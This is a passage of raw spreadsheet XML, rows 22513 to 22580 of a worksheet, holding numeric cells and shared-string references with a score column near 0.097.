      <c r="B22513" s="2">
        <v>1.301877E7</v>
      </c>
      <c r="C22513" s="2" t="s">
        <v>21745</v>
      </c>
      <c r="D22513" s="2">
        <v>1.0</v>
      </c>
      <c r="E22513" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22513" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22514" ht="15.75" customHeight="1">
      <c r="A22514" s="1">
        <v>25423.0</v>
      </c>
      <c r="B22514" s="2">
        <v>1.379766E7</v>
      </c>
      <c r="C22514" s="2" t="s">
        <v>21746</v>
      </c>
      <c r="D22514" s="2">
        <v>1.0</v>
      </c>
      <c r="E22514" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22514" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22515" ht="15.75" customHeight="1">
      <c r="A22515" s="1">
        <v>25771.0</v>
      </c>
      <c r="B22515" s="2">
        <v>1.4652074E7</v>
      </c>
      <c r="C22515" s="2" t="s">
        <v>21747</v>
      </c>
      <c r="D22515" s="2">
        <v>1.0</v>
      </c>
      <c r="E22515" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22515" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22516" ht="15.75" customHeight="1">
      <c r="A22516" s="1">
        <v>26268.0</v>
      </c>
      <c r="B22516" s="2">
        <v>1.6377141E7</v>
      </c>
      <c r="C22516" s="2" t="s">
        <v>21748</v>
      </c>
      <c r="D22516" s="2">
        <v>1.0</v>
      </c>
      <c r="E22516" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22516" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22517" ht="15.75" customHeight="1">
      <c r="A22517" s="1">
        <v>26395.0</v>
      </c>
      <c r="B22517" s="2">
        <v>1.7012803E7</v>
      </c>
      <c r="C22517" s="2" t="s">
        <v>21731</v>
      </c>
      <c r="D22517" s="2">
        <v>1.0</v>
      </c>
      <c r="E22517" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22517" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22518" ht="15.75" customHeight="1">
      <c r="A22518" s="1">
        <v>26537.0</v>
      </c>
      <c r="B22518" s="2">
        <v>1.7710399E7</v>
      </c>
      <c r="C22518" s="2" t="s">
        <v>21749</v>
      </c>
      <c r="D22518" s="2">
        <v>1.0</v>
      </c>
      <c r="E22518" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22518" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22519" ht="15.75" customHeight="1">
      <c r="A22519" s="1">
        <v>26675.0</v>
      </c>
      <c r="B22519" s="2">
        <v>1.8075693E7</v>
      </c>
      <c r="C22519" s="2" t="s">
        <v>18435</v>
      </c>
      <c r="D22519" s="2">
        <v>1.0</v>
      </c>
      <c r="E22519" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22519" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22520" ht="15.75" customHeight="1">
      <c r="A22520" s="1">
        <v>26833.0</v>
      </c>
      <c r="B22520" s="2">
        <v>1.8871735E7</v>
      </c>
      <c r="C22520" s="2" t="s">
        <v>21750</v>
      </c>
      <c r="D22520" s="2">
        <v>1.0</v>
      </c>
      <c r="E22520" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22520" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22521" ht="15.75" customHeight="1">
      <c r="A22521" s="1">
        <v>27112.0</v>
      </c>
      <c r="B22521" s="2">
        <v>2.0631345E7</v>
      </c>
      <c r="C22521" s="2" t="s">
        <v>21751</v>
      </c>
      <c r="D22521" s="2">
        <v>1.0</v>
      </c>
      <c r="E22521" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22521" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22522" ht="15.75" customHeight="1">
      <c r="A22522" s="1">
        <v>27173.0</v>
      </c>
      <c r="B22522" s="2">
        <v>2.0852327E7</v>
      </c>
      <c r="C22522" s="2" t="s">
        <v>21752</v>
      </c>
      <c r="D22522" s="2">
        <v>1.0</v>
      </c>
      <c r="E22522" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22522" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22523" ht="15.75" customHeight="1">
      <c r="A22523" s="1">
        <v>27383.0</v>
      </c>
      <c r="B22523" s="2">
        <v>2.1750289E7</v>
      </c>
      <c r="C22523" s="2" t="s">
        <v>21043</v>
      </c>
      <c r="D22523" s="2">
        <v>1.0</v>
      </c>
      <c r="E22523" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22523" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22524" ht="15.75" customHeight="1">
      <c r="A22524" s="1">
        <v>27751.0</v>
      </c>
      <c r="B22524" s="2">
        <v>2.3100764E7</v>
      </c>
      <c r="C22524" s="2" t="s">
        <v>21753</v>
      </c>
      <c r="D22524" s="2">
        <v>1.0</v>
      </c>
      <c r="E22524" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22524" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22525" ht="15.75" customHeight="1">
      <c r="A22525" s="1">
        <v>27953.0</v>
      </c>
      <c r="B22525" s="2">
        <v>2.3875291E7</v>
      </c>
      <c r="C22525" s="2" t="s">
        <v>21754</v>
      </c>
      <c r="D22525" s="2">
        <v>1.0</v>
      </c>
      <c r="E22525" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22525" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22526" ht="15.75" customHeight="1">
      <c r="A22526" s="1">
        <v>28015.0</v>
      </c>
      <c r="B22526" s="2">
        <v>2.4340949E7</v>
      </c>
      <c r="C22526" s="2" t="s">
        <v>21755</v>
      </c>
      <c r="D22526" s="2">
        <v>1.0</v>
      </c>
      <c r="E22526" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22526" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22527" ht="15.75" customHeight="1">
      <c r="A22527" s="1">
        <v>28059.0</v>
      </c>
      <c r="B22527" s="2">
        <v>2.4573706E7</v>
      </c>
      <c r="C22527" s="2" t="s">
        <v>21043</v>
      </c>
      <c r="D22527" s="2">
        <v>1.0</v>
      </c>
      <c r="E22527" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22527" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22528" ht="15.75" customHeight="1">
      <c r="A22528" s="1">
        <v>28882.0</v>
      </c>
      <c r="B22528" s="2">
        <v>2.9207931E7</v>
      </c>
      <c r="C22528" s="2" t="s">
        <v>21732</v>
      </c>
      <c r="D22528" s="2">
        <v>1.0</v>
      </c>
      <c r="E22528" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22528" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22529" ht="15.75" customHeight="1">
      <c r="A22529" s="1">
        <v>29373.0</v>
      </c>
      <c r="B22529" s="2">
        <v>3.1722036E7</v>
      </c>
      <c r="C22529" s="2" t="s">
        <v>21756</v>
      </c>
      <c r="D22529" s="2">
        <v>1.0</v>
      </c>
      <c r="E22529" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22529" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22530" ht="15.75" customHeight="1">
      <c r="A22530" s="1">
        <v>29964.0</v>
      </c>
      <c r="B22530" s="2">
        <v>3608098.0</v>
      </c>
      <c r="C22530" s="2" t="s">
        <v>21757</v>
      </c>
      <c r="D22530" s="2">
        <v>1.0</v>
      </c>
      <c r="E22530" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22530" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22531" ht="15.75" customHeight="1">
      <c r="A22531" s="1">
        <v>30477.0</v>
      </c>
      <c r="B22531" s="2">
        <v>3.9697308E7</v>
      </c>
      <c r="C22531" s="2" t="s">
        <v>21758</v>
      </c>
      <c r="D22531" s="2">
        <v>1.0</v>
      </c>
      <c r="E22531" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22531" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22532" ht="15.75" customHeight="1">
      <c r="A22532" s="1">
        <v>30516.0</v>
      </c>
      <c r="B22532" s="2">
        <v>4013074.0</v>
      </c>
      <c r="C22532" s="2" t="s">
        <v>21759</v>
      </c>
      <c r="D22532" s="2">
        <v>1.0</v>
      </c>
      <c r="E22532" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22532" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22533" ht="15.75" customHeight="1">
      <c r="A22533" s="1">
        <v>30791.0</v>
      </c>
      <c r="B22533" s="2">
        <v>4.4987437E7</v>
      </c>
      <c r="C22533" s="2" t="s">
        <v>21733</v>
      </c>
      <c r="D22533" s="2">
        <v>1.0</v>
      </c>
      <c r="E22533" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22533" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22534" ht="15.75" customHeight="1">
      <c r="A22534" s="1">
        <v>30793.0</v>
      </c>
      <c r="B22534" s="2">
        <v>4.498745E7</v>
      </c>
      <c r="C22534" s="2" t="s">
        <v>21733</v>
      </c>
      <c r="D22534" s="2">
        <v>1.0</v>
      </c>
      <c r="E22534" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22534" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22535" ht="15.75" customHeight="1">
      <c r="A22535" s="1">
        <v>31084.0</v>
      </c>
      <c r="B22535" s="2">
        <v>4.8356579E7</v>
      </c>
      <c r="C22535" s="2" t="s">
        <v>21760</v>
      </c>
      <c r="D22535" s="2">
        <v>1.0</v>
      </c>
      <c r="E22535" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22535" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22536" ht="15.75" customHeight="1">
      <c r="A22536" s="1">
        <v>31176.0</v>
      </c>
      <c r="B22536" s="2">
        <v>4913043.0</v>
      </c>
      <c r="C22536" s="2" t="s">
        <v>21761</v>
      </c>
      <c r="D22536" s="2">
        <v>1.0</v>
      </c>
      <c r="E22536" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22536" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22537" ht="15.75" customHeight="1">
      <c r="A22537" s="1">
        <v>31229.0</v>
      </c>
      <c r="B22537" s="2">
        <v>4926514.0</v>
      </c>
      <c r="C22537" s="2" t="s">
        <v>21762</v>
      </c>
      <c r="D22537" s="2">
        <v>1.0</v>
      </c>
      <c r="E22537" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22537" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22538" ht="15.75" customHeight="1">
      <c r="A22538" s="1">
        <v>31231.0</v>
      </c>
      <c r="B22538" s="2">
        <v>4926606.0</v>
      </c>
      <c r="C22538" s="2" t="s">
        <v>21763</v>
      </c>
      <c r="D22538" s="2">
        <v>1.0</v>
      </c>
      <c r="E22538" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22538" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22539" ht="15.75" customHeight="1">
      <c r="A22539" s="1">
        <v>31267.0</v>
      </c>
      <c r="B22539" s="2">
        <v>4942565.0</v>
      </c>
      <c r="C22539" s="2" t="s">
        <v>21764</v>
      </c>
      <c r="D22539" s="2">
        <v>1.0</v>
      </c>
      <c r="E22539" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22539" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22540" ht="15.75" customHeight="1">
      <c r="A22540" s="1">
        <v>31630.0</v>
      </c>
      <c r="B22540" s="2">
        <v>5145234.0</v>
      </c>
      <c r="C22540" s="2" t="s">
        <v>21765</v>
      </c>
      <c r="D22540" s="2">
        <v>1.0</v>
      </c>
      <c r="E22540" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22540" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22541" ht="15.75" customHeight="1">
      <c r="A22541" s="1">
        <v>32417.0</v>
      </c>
      <c r="B22541" s="2">
        <v>5641239.0</v>
      </c>
      <c r="C22541" s="2" t="s">
        <v>21766</v>
      </c>
      <c r="D22541" s="2">
        <v>1.0</v>
      </c>
      <c r="E22541" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22541" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22542" ht="15.75" customHeight="1">
      <c r="A22542" s="1">
        <v>32678.0</v>
      </c>
      <c r="B22542" s="2">
        <v>5942495.0</v>
      </c>
      <c r="C22542" s="2" t="s">
        <v>21767</v>
      </c>
      <c r="D22542" s="2">
        <v>1.0</v>
      </c>
      <c r="E22542" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22542" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22543" ht="15.75" customHeight="1">
      <c r="A22543" s="1">
        <v>33044.0</v>
      </c>
      <c r="B22543" s="2">
        <v>6739237.0</v>
      </c>
      <c r="C22543" s="2" t="s">
        <v>21768</v>
      </c>
      <c r="D22543" s="2">
        <v>1.0</v>
      </c>
      <c r="E22543" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22543" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22544" ht="15.75" customHeight="1">
      <c r="A22544" s="1">
        <v>33433.0</v>
      </c>
      <c r="B22544" s="2">
        <v>7810382.0</v>
      </c>
      <c r="C22544" s="2" t="s">
        <v>21769</v>
      </c>
      <c r="D22544" s="2">
        <v>1.0</v>
      </c>
      <c r="E22544" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22544" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22545" ht="15.75" customHeight="1">
      <c r="A22545" s="1">
        <v>33902.0</v>
      </c>
      <c r="B22545" s="2">
        <v>9215029.0</v>
      </c>
      <c r="C22545" s="2" t="s">
        <v>21770</v>
      </c>
      <c r="D22545" s="2">
        <v>1.0</v>
      </c>
      <c r="E22545" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22545" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22546" ht="15.75" customHeight="1">
      <c r="A22546" s="1">
        <v>33953.0</v>
      </c>
      <c r="B22546" s="2">
        <v>9301161.0</v>
      </c>
      <c r="C22546" s="2" t="s">
        <v>21771</v>
      </c>
      <c r="D22546" s="2">
        <v>1.0</v>
      </c>
      <c r="E22546" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22546" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22547" ht="15.75" customHeight="1">
      <c r="A22547" s="1">
        <v>33968.0</v>
      </c>
      <c r="B22547" s="2">
        <v>9358658.0</v>
      </c>
      <c r="C22547" s="2" t="s">
        <v>21772</v>
      </c>
      <c r="D22547" s="2">
        <v>1.0</v>
      </c>
      <c r="E22547" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22547" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22548" ht="15.75" customHeight="1">
      <c r="A22548" s="1">
        <v>33999.0</v>
      </c>
      <c r="B22548" s="2">
        <v>9456989.0</v>
      </c>
      <c r="C22548" s="2" t="s">
        <v>21738</v>
      </c>
      <c r="D22548" s="2">
        <v>1.0</v>
      </c>
      <c r="E22548" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22548" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22549" ht="15.75" customHeight="1">
      <c r="A22549" s="1">
        <v>34134.0</v>
      </c>
      <c r="B22549" s="2">
        <v>9782436.0</v>
      </c>
      <c r="C22549" s="2" t="s">
        <v>21773</v>
      </c>
      <c r="D22549" s="2">
        <v>1.0</v>
      </c>
      <c r="E22549" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22549" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22550" ht="15.75" customHeight="1">
      <c r="A22550" s="1">
        <v>14894.0</v>
      </c>
      <c r="B22550" s="2">
        <v>4.1138254E7</v>
      </c>
      <c r="C22550" s="2" t="s">
        <v>21774</v>
      </c>
      <c r="D22550" s="2">
        <v>1.0</v>
      </c>
      <c r="E22550" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22550" s="2">
        <v>0.09748427672955974</v>
      </c>
    </row>
    <row r="22551" ht="15.75" customHeight="1">
      <c r="A22551" s="1">
        <v>8911.0</v>
      </c>
      <c r="B22551" s="2">
        <v>5.4810151E7</v>
      </c>
      <c r="C22551" s="2" t="s">
        <v>21775</v>
      </c>
      <c r="D22551" s="2">
        <v>1.0</v>
      </c>
      <c r="E22551" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22551" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="22552" ht="15.75" customHeight="1">
      <c r="A22552" s="1">
        <v>12223.0</v>
      </c>
      <c r="B22552" s="2">
        <v>2.7742652E7</v>
      </c>
      <c r="C22552" s="2" t="s">
        <v>21776</v>
      </c>
      <c r="D22552" s="2">
        <v>1.0</v>
      </c>
      <c r="E22552" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22552" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="22553" ht="15.75" customHeight="1">
      <c r="A22553" s="1">
        <v>17491.0</v>
      </c>
      <c r="B22553" s="2">
        <v>4.9965085E7</v>
      </c>
      <c r="C22553" s="2" t="s">
        <v>21777</v>
      </c>
      <c r="D22553" s="2">
        <v>1.0</v>
      </c>
      <c r="E22553" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22553" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="22554" ht="15.75" customHeight="1">
      <c r="A22554" s="1">
        <v>20111.0</v>
      </c>
      <c r="B22554" s="2">
        <v>9988606.0</v>
      </c>
      <c r="C22554" s="2" t="s">
        <v>21778</v>
      </c>
      <c r="D22554" s="2">
        <v>1.0</v>
      </c>
      <c r="E22554" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22554" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="22555" ht="15.75" customHeight="1">
      <c r="A22555" s="1">
        <v>30369.0</v>
      </c>
      <c r="B22555" s="2">
        <v>3.8387431E7</v>
      </c>
      <c r="C22555" s="2" t="s">
        <v>21779</v>
      </c>
      <c r="D22555" s="2">
        <v>1.0</v>
      </c>
      <c r="E22555" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22555" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="22556" ht="15.75" customHeight="1">
      <c r="A22556" s="1">
        <v>33723.0</v>
      </c>
      <c r="B22556" s="2">
        <v>8517343.0</v>
      </c>
      <c r="C22556" s="2" t="s">
        <v>21780</v>
      </c>
      <c r="D22556" s="2">
        <v>1.0</v>
      </c>
      <c r="E22556" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22556" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="22557" ht="15.75" customHeight="1">
      <c r="A22557" s="1">
        <v>3955.0</v>
      </c>
      <c r="B22557" s="2">
        <v>4.0674538E7</v>
      </c>
      <c r="C22557" s="2" t="s">
        <v>21781</v>
      </c>
      <c r="D22557" s="2">
        <v>1.0</v>
      </c>
      <c r="E22557" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22557" s="2">
        <v>0.0972222222222222</v>
      </c>
    </row>
    <row r="22558" ht="15.75" customHeight="1">
      <c r="A22558" s="1">
        <v>14791.0</v>
      </c>
      <c r="B22558" s="2">
        <v>4.0922281E7</v>
      </c>
      <c r="C22558" s="2" t="s">
        <v>21782</v>
      </c>
      <c r="D22558" s="2">
        <v>1.0</v>
      </c>
      <c r="E22558" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22558" s="2">
        <v>0.0972222222222222</v>
      </c>
    </row>
    <row r="22559" ht="15.75" customHeight="1">
      <c r="A22559" s="1">
        <v>2339.0</v>
      </c>
      <c r="B22559" s="2">
        <v>3.2982046E7</v>
      </c>
      <c r="C22559" s="2" t="s">
        <v>21783</v>
      </c>
      <c r="D22559" s="2">
        <v>1.0</v>
      </c>
      <c r="E22559" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22559" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="22560" ht="15.75" customHeight="1">
      <c r="A22560" s="1">
        <v>4949.0</v>
      </c>
      <c r="B22560" s="2">
        <v>4.4053078E7</v>
      </c>
      <c r="C22560" s="2" t="s">
        <v>21784</v>
      </c>
      <c r="D22560" s="2">
        <v>1.0</v>
      </c>
      <c r="E22560" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22560" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="22561" ht="15.75" customHeight="1">
      <c r="A22561" s="1">
        <v>7743.0</v>
      </c>
      <c r="B22561" s="2">
        <v>5.2057658E7</v>
      </c>
      <c r="C22561" s="2" t="s">
        <v>21785</v>
      </c>
      <c r="D22561" s="2">
        <v>1.0</v>
      </c>
      <c r="E22561" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22561" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="22562" ht="15.75" customHeight="1">
      <c r="A22562" s="1">
        <v>8339.0</v>
      </c>
      <c r="B22562" s="2">
        <v>5.3707017E7</v>
      </c>
      <c r="C22562" s="2" t="s">
        <v>21786</v>
      </c>
      <c r="D22562" s="2">
        <v>1.0</v>
      </c>
      <c r="E22562" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22562" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="22563" ht="15.75" customHeight="1">
      <c r="A22563" s="1">
        <v>24629.0</v>
      </c>
      <c r="B22563" s="2">
        <v>1.1470566E7</v>
      </c>
      <c r="C22563" s="2" t="s">
        <v>21787</v>
      </c>
      <c r="D22563" s="2">
        <v>1.0</v>
      </c>
      <c r="E22563" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22563" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="22564" ht="15.75" customHeight="1">
      <c r="A22564" s="1">
        <v>30817.0</v>
      </c>
      <c r="B22564" s="2">
        <v>4.5334521E7</v>
      </c>
      <c r="C22564" s="2" t="s">
        <v>21788</v>
      </c>
      <c r="D22564" s="2">
        <v>1.0</v>
      </c>
      <c r="E22564" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22564" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="22565" ht="15.75" customHeight="1">
      <c r="A22565" s="1">
        <v>1392.0</v>
      </c>
      <c r="B22565" s="2">
        <v>2.6268039E7</v>
      </c>
      <c r="C22565" s="2" t="s">
        <v>21789</v>
      </c>
      <c r="D22565" s="2">
        <v>1.0</v>
      </c>
      <c r="E22565" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22565" s="2">
        <v>0.0969498910675381</v>
      </c>
    </row>
    <row r="22566" ht="15.75" customHeight="1">
      <c r="A22566" s="1">
        <v>1445.0</v>
      </c>
      <c r="B22566" s="2">
        <v>2.6792372E7</v>
      </c>
      <c r="C22566" s="2" t="s">
        <v>21790</v>
      </c>
      <c r="D22566" s="2">
        <v>1.0</v>
      </c>
      <c r="E22566" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22566" s="2">
        <v>0.0969498910675381</v>
      </c>
    </row>
    <row r="22567" ht="15.75" customHeight="1">
      <c r="A22567" s="1">
        <v>1950.0</v>
      </c>
      <c r="B22567" s="2">
        <v>3.0236079E7</v>
      </c>
      <c r="C22567" s="2" t="s">
        <v>21791</v>
      </c>
      <c r="D22567" s="2">
        <v>1.0</v>
      </c>
      <c r="E22567" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22567" s="2">
        <v>0.0969498910675381</v>
      </c>
    </row>
    <row r="22568" ht="15.75" customHeight="1">
      <c r="A22568" s="1">
        <v>4211.0</v>
      </c>
      <c r="B22568" s="2">
        <v>4.1689299E7</v>
      </c>
      <c r="C22568" s="2" t="s">
        <v>21792</v>
      </c>
      <c r="D22568" s="2">
        <v>1.0</v>
      </c>
      <c r="E22568" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22568" s="2">
        <v>0.0969498910675381</v>
      </c>
    </row>
    <row r="22569" ht="15.75" customHeight="1">
      <c r="A22569" s="1">
        <v>4416.0</v>
      </c>
      <c r="B22569" s="2">
        <v>4.2294059E7</v>
      </c>
      <c r="C22569" s="2" t="s">
        <v>21793</v>
      </c>
      <c r="D22569" s="2">
        <v>1.0</v>
      </c>
      <c r="E22569" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22569" s="2">
        <v>0.0969498910675381</v>
      </c>
    </row>
    <row r="22570" ht="15.75" customHeight="1">
      <c r="A22570" s="1">
        <v>6386.0</v>
      </c>
      <c r="B22570" s="2">
        <v>4.8438657E7</v>
      </c>
      <c r="C22570" s="2" t="s">
        <v>21794</v>
      </c>
      <c r="D22570" s="2">
        <v>1.0</v>
      </c>
      <c r="E22570" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22570" s="2">
        <v>0.0969498910675381</v>
      </c>
    </row>
    <row r="22571" ht="15.75" customHeight="1">
      <c r="A22571" s="1">
        <v>6525.0</v>
      </c>
      <c r="B22571" s="2">
        <v>4.8815152E7</v>
      </c>
      <c r="C22571" s="2" t="s">
        <v>21795</v>
      </c>
      <c r="D22571" s="2">
        <v>1.0</v>
      </c>
      <c r="E22571" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22571" s="2">
        <v>0.0969498910675381</v>
      </c>
    </row>
    <row r="22572" ht="15.75" customHeight="1">
      <c r="A22572" s="1">
        <v>11684.0</v>
      </c>
      <c r="B22572" s="2">
        <v>2.3444571E7</v>
      </c>
      <c r="C22572" s="2" t="s">
        <v>21796</v>
      </c>
      <c r="D22572" s="2">
        <v>1.0</v>
      </c>
      <c r="E22572" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22572" s="2">
        <v>0.0969498910675381</v>
      </c>
    </row>
    <row r="22573" ht="15.75" customHeight="1">
      <c r="A22573" s="1">
        <v>28635.0</v>
      </c>
      <c r="B22573" s="2">
        <v>2.7296943E7</v>
      </c>
      <c r="C22573" s="2" t="s">
        <v>21797</v>
      </c>
      <c r="D22573" s="2">
        <v>1.0</v>
      </c>
      <c r="E22573" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22573" s="2">
        <v>0.0969498910675381</v>
      </c>
    </row>
    <row r="22574" ht="15.75" customHeight="1">
      <c r="A22574" s="1">
        <v>27020.0</v>
      </c>
      <c r="B22574" s="2">
        <v>2.0036703E7</v>
      </c>
      <c r="C22574" s="2" t="s">
        <v>21798</v>
      </c>
      <c r="D22574" s="2">
        <v>1.0</v>
      </c>
      <c r="E22574" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22574" s="2">
        <v>0.09674329501915709</v>
      </c>
    </row>
    <row r="22575" ht="15.75" customHeight="1">
      <c r="A22575" s="1">
        <v>26611.0</v>
      </c>
      <c r="B22575" s="2">
        <v>1.8015513E7</v>
      </c>
      <c r="C22575" s="2" t="s">
        <v>21799</v>
      </c>
      <c r="D22575" s="2">
        <v>1.0</v>
      </c>
      <c r="E22575" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22575" s="2">
        <v>0.09674329501915707</v>
      </c>
    </row>
    <row r="22576" ht="15.75" customHeight="1">
      <c r="A22576" s="1">
        <v>24841.0</v>
      </c>
      <c r="B22576" s="2">
        <v>1.2179913E7</v>
      </c>
      <c r="C22576" s="2" t="s">
        <v>21800</v>
      </c>
      <c r="D22576" s="2">
        <v>1.0</v>
      </c>
      <c r="E22576" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22576" s="2">
        <v>0.09649122807017543</v>
      </c>
    </row>
    <row r="22577" ht="15.75" customHeight="1">
      <c r="A22577" s="1">
        <v>19350.0</v>
      </c>
      <c r="B22577" s="2">
        <v>5.5389093E7</v>
      </c>
      <c r="C22577" s="2" t="s">
        <v>21801</v>
      </c>
      <c r="D22577" s="2">
        <v>1.0</v>
      </c>
      <c r="E22577" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22577" s="2">
        <v>0.0964912280701754</v>
      </c>
    </row>
    <row r="22578" ht="15.75" customHeight="1">
      <c r="A22578" s="1">
        <v>12057.0</v>
      </c>
      <c r="B22578" s="2">
        <v>2.6448909E7</v>
      </c>
      <c r="C22578" s="2" t="s">
        <v>21802</v>
      </c>
      <c r="D22578" s="2">
        <v>1.0</v>
      </c>
      <c r="E22578" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22578" s="2">
        <v>0.09623015873015872</v>
      </c>
    </row>
    <row r="22579" ht="15.75" customHeight="1">
      <c r="A22579" s="1">
        <v>28488.0</v>
      </c>
      <c r="B22579" s="2">
        <v>2.6668519E7</v>
      </c>
      <c r="C22579" s="2" t="s">
        <v>21803</v>
      </c>
      <c r="D22579" s="2">
        <v>1.0</v>
      </c>
      <c r="E22579" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22579" s="2">
        <v>0.09623015873015872</v>
      </c>
    </row>
    <row r="22580" ht="15.75" customHeight="1">
      <c r="A22580" s="1">
        <v>6730.0</v>
      </c>
      <c r="B22580" s="2">
        <v>4.9317551E7</v>
